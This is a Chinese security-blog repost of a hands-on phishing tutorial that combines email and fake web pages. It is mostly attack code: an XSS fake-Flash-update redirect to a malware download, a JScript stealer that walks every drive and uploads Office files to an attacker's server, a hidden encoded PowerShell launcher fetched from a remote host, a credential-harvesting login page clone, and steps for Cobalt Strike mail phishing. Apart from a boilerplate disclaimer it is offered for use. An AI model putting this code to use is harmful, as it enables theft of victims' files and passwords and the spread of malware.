钓鱼实战2组合邮件,网页钓鱼

admin 2022年2月23日09:45:01评论1 views字数 6008阅读20分1秒阅读模式

这里浅谈的是邮件或者网页钓鱼的进一步思路 

对常见的思路做了一个概括和总结

对自己而言呢,发文章写文章也是对自己的学习到的一些东西做一个总结

补充上一篇,一个word捆绑思路

https://www.t00ls.cc/thread-57060-4-1.html

组合前端页面进行钓鱼

Flash钓鱼

1.xss_flash flash钓鱼全套源码

https://github.com/hackxc/xss_flash

2.self-flash钓鱼另一套源码

https://github.com/RomaneeSean/xss-flash-fishing

1.1组合flash钓鱼弹窗版

tools那边来的源码 感觉师傅们很强大

钓鱼实战2组合邮件,网页钓鱼直接进行下载弹窗 把这个源码的js文件扔到xss平台中去 然后直接弹窗即可 在这里插入图片描述

钓鱼实战2组合邮件,网页钓鱼1.2页面跳转思路弹窗下载

思路伪造一个flash主页 然后跳转到flash页面中进行下载免杀马

跳转代码 xss平台模块中进行去定义

window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src"'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低,请尝试升级后访问该页面!");window.location.href="钓鱼页面";

自定义代码配置

钓鱼实战2组合邮件,网页钓鱼

然后在xss中进行弹窗就好了 点击即可完成一个完整的钓鱼操作

钓鱼实战2组合邮件,网页钓鱼

JS文件钓鱼

Js 方式的 IP 定位 逆向追踪溯源访客真实身份 调查取证

https://www.t00ls.cc/viewthread.php?tid=50908&highlight=js

这个是asp的脚本我没搭尝试 不过看源码感觉很不错

JS小偷

服务接受端 Server.php

<?php
if($_SERVER['REQUEST_METHOD'] == 'POST'){
 $fileName = uniqid(rand()) . '_' . iconv('utf-8''gbk', $_SERVER['HTTP_FILENAME']);
 print_r(file_put_contents("uploads/{$fileName}", $HTTP_RAW_POST_DATA));
}
?>

客户浏览器内容端

var __POSTURL__ = 'http://用户的服务器/Server.php';

function UpFile(FilePath, FileName{
 var Stream = new ActiveXObject('ADODB.Stream');
 Stream.Type = 1;
 Stream.Open();
 Stream.LoadFromFile(FilePath);
 var XHR = new ActiveXObject('Msxml2.XMLHTTP' || 'Microsoft.XMLHTTP');
 XHR.open('POST', __POSTURL__, false);
 XHR.setRequestHeader('fileName', FileName);
 XHR.setRequestHeader('enctype''multipart/form-data');
 XHR.send(Stream.Read());
 Stream.Close();
 return XHR.responseText
}
function GetDriveList() {
 var fso = new ActiveXObject("Scripting.FileSystemObject");
 var e = new Enumerator(fso.Drives);
 var re = [];
 for (; ! e.atEnd(); e.moveNext()) {
  if (e.item().IsReady) {
   re.push(e.item().DriveLetter)
  }
 }
 return re
}
function GetFolderList(folderspec{
 var fso = new ActiveXObject("Scripting.FileSystemObject");
 var f = fso.GetFolder(folderspec);
 var fc = new Enumerator(f.SubFolders);
 var re = [];
 for (; ! fc.atEnd(); fc.moveNext()) {
  re.push(fc.item())
 }
 return re
}
function GetFileList(folderspec{
 var fso = new ActiveXObject("Scripting.FileSystemObject");
 var f = fso.GetFolder(folderspec);
 var fc = new Enumerator(f.files);
 var re = [];
 for (; ! fc.atEnd(); fc.moveNext()) {
  re.push([fc.item(), fc.item().Name])
 }
 return re
}
function Search(Drive{
 var FolderList = GetFolderList(Drive);
 for (var i = 0; i < FolderList.length; i++) {
  Search(FolderList[i])
 }
 var FileList = GetFileList(Drive);
 for (var i = 0; i < FileList.length; i++) {
  if (/.(doc|docx|xls|xlsx)$/i.test(FileList[i])) {
   UpFile(FileList[i][0], FileList[i][1])
  }
 }
}
function Load() {
 var WMIs = GetObject("winmgmts:\\.\root\cimv2");
 var Items = WMIs.ExecQuery("SELECT * FROM Win32_Process WHERE Name = 'wscript.exe'");
 var i = 0,
 rs = new Enumerator(Items);
 for (; ! rs.atEnd(); rs.moveNext()) {
  i++
 }
 if (i > 1) WScript.Quit(0);
 Items = WMIs = i = rs = null;
 var DriveList = GetDriveList();
 for (var i = 0; i < DriveList.length; i++) {
  Search(DriveList[i] + ":\\")
 }
}
Load();

反制思路

典型利用调用ie自身浏览器的时候可以利用

如wirar文件中打开的弹窗广告即是

如果拿到一台dns服务器后把host文件解析的ip换成自己可控服务器的

即winrar的网站解析的换成自己服务器可控的 进而调用ie自身浏览器 

实现反制上线

1.js

(function(){
require('child_process').exec('powershell -nop -w hidden -encodedcommand JABXXXXXXXX......');
})();

index.html

<?php
header("X-Powered-By: PHP/<img src=1 οnerrοr=import(unescape('http%3A//192.168.0.198:81/js/1.js'))>");
?>

<head>
<title>SEC TEST</title>
</head>
<body>
</body>
</html>

前端页面伪造钓鱼

前端页面

结合扒网站去伪造一个钓鱼网页即可 然后结合xss跳转代码进行利用攻击即可 

伪造一个中交互的沙箱结合xss钓鱼即可实现进阶攻击

 常见的扒网站的工具 Save All Resources  chrome的插件 Teleport Ultra

<html>
 <head></head>
 <body>
  <form action="login.php" method="post"> 
   <fieldset> 
    <legend>用户登录</legend> 
    <ul> 
     <li> <label>用户名:</label> <input type="text" name="username" /> </li> 
     <li> <label>密 码:</label> <input type="password" name="password" /> </li> 
     <li> <label> </label> <input type="submit" name="login" value="登录" /> </li> 
    </ul> 
   </fieldset>
  </form>
 </body>
</html>  

login.php文件的页面

<!--?php
//简单处理 
 header('Content-type:text/html; charset=utf-8');   // 处理用户登录信息  
if (isset($_POST['login'])) {    
   $username = trim($_POST['username']);  
   $password = trim($_POST['password']); 
   if (($username != '') || ($password != '')) 
{            
$myfile = fopen("newfile.txt","w");
            $txt = $username."    ".$password;
                        fwrite($myfile,$txt);           
                        fclose($myfile);       
                         }
}
?-->

#其他 常见的逻辑代码类型

   <?php
 $str1='';
//获得当前的脚本网址 
function GetCurUrl() 

if(!empty($_SERVER["REQUEST_URI"])) 

$scriptName = $_SERVER["REQUEST_URI"]; 
$nowurl = $scriptName
$nowurl=str_replace("/","",$nowurl);//一个是字符串匹配.一个是正则匹配两个的内容是不一样的。
$nowurl=preg_replace("/[a-z,?]*?dq=/","",$nowurl);


return $nowurl


$nowurl=GetCurUrl();
$url = $_SERVER["HTTP_REFERER"]; //获取完整的来路URL   
$str = str_replace("http://","",$url); //去掉http:// 
if((strpos($str,'social')!==false))
{
$social=
'替换后的内容'.$str1.'';
$a="/".$nowurl."/";
$social=preg_replace($a,$nowurl.'"class="now',$social);
     
echo $social;
}
if((strpos($str,'campus')!==false)||(strpos($str,'index')!==false)||(strpos($str,'szzwxq')!==false))
{
    $str1=str_replace("social","campus",$str1);
    $campus=
'替换后的内容'.$str1.'';
$a="/".$nowurl."/";
    $campus=preg_replace($a,$nowurl.'"class="now',$campus);
    echo $campus;   
          
}

if((strpos($str,'intern')!==false)||(strpos($str,'index')!==false)||(strpos($str,'xzzwxq')!==false))
{
    $str1=str_replace("social","intern",$str1);
    $intern=
'替换后的内容'.$str1.'';
 $a="/".$nowurl."/";
    $intern=preg_replace($a,$nowurl.'"class="now',$intern);
    echo $intern;   
    
         
}

?>


特殊的浏览器漏洞类的钓鱼姿势

Jenkins在钓鱼后门方面的一些姿势

https://www.t00ls.cc/viewthread.php?tid=64071&highlight=%E9%92%93%E9%B1%BC

组合邮箱进行钓鱼

这里以cs为例

如果是网易邮箱,SMTP Host:需要填写smtp.ym.163.com
如果是QQ邮箱,SMTP Host:填写smtp.qq.com
端口均是25

准备条件 

①获取一个模板 

方法:

1.点击qq的随便一个邮件

钓鱼实战2组合邮件,网页钓鱼2.点击新窗口打开 选择显示邮件原文进行保存或者直接导出eml文件即可

钓鱼实战2组合邮件,网页钓鱼②选择cs的攻击选择邮件钓鱼

钓鱼实战2组合邮件,网页钓鱼

进行输入相关的内容

钓鱼实战2组合邮件,网页钓鱼
钓鱼实战2组合邮件,网页钓鱼

钓鱼实战2组合邮件,网页钓鱼进行输入内容后点击preview即可预览 send即直接发送相关的内容

钓鱼实战2组合邮件,网页钓鱼常常组合页面伪造去钓鱼

原文始发于微信公众号(goddemon的小屋):钓鱼实战2--组合邮件,网页钓鱼

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月23日09:45:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   钓鱼实战2组合邮件,网页钓鱼https://cn-sec.com/archives/799100.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息